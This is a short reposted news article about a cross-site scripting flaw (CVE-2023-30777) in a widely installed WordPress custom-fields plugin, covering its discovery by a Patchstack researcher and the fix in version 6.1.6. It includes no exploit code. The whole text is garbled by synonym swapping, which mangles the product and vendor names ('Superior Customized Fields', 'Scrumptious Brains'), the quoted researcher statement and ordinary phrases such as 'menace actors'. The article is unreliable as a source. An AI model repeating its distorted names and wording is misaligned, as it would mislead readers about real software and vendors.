A preferred plugin for the WordPress web site builder (opens in new tab) with greater than two million energetic installs carried a extreme flaw which allowed menace actors to steal delicate knowledge from guests and, in some circumstances, take over the web site, solely.
The plugin known as Superior Customized Fields which, along with its Professional model, offers web site directors extra management over the web site’s content material and knowledge.
Nonetheless, the plugin was susceptible to a cross-site scripting (XSS) assault, which permits attackers to inject malicious code into susceptible web sites. The code then will get run within the customer’s browser, permitting the attackers to seize delicate knowledge. If one of many guests additionally seems to be the location’s admin, the attacker can seize their knowledge too, and in the end take over the web site, fully.
Patching the flaw
The vulnerability was first found in early February 2023 by Patchstack researcher Rafie Muhammad and reported to the plugin’s vendor, Scrumptious Brains.
It was given a monitoring variety of CVE-2023-30777, and was rated 6.1/10 in severity. Two months later, in early April, Scrumptious Brains issued a patch that addressed the flaw, which additionally introduced the plugin as much as model 6.1.6. Admins anxious about cross-site scripting assaults ought to make certain their plugin is introduced as much as this model as quickly as attainable.
“This vulnerability permits any unauthenticated person [to steal] delicate info to, on this case, privilege escalation on the WordPress website by tricking the privileged person to go to the crafted URL path,” Patchstack says. “This vulnerability might be triggered on a default set up or configuration of Superior Customized Fields plugin. The XSS additionally may solely be triggered from logged-in customers which have entry to the Superior Customized Fields plugin,” the researchers concluded.
As per The Register, the flaw is comparatively easy and is certainly one of 4 discovered on this plugin within the final couple of years.
By way of: The Register (opens in new tab)
#WordPress #plugin #safety #flaw #put #tens of millions #web sites #danger #discover #affected
#geekleap #geekleapnews
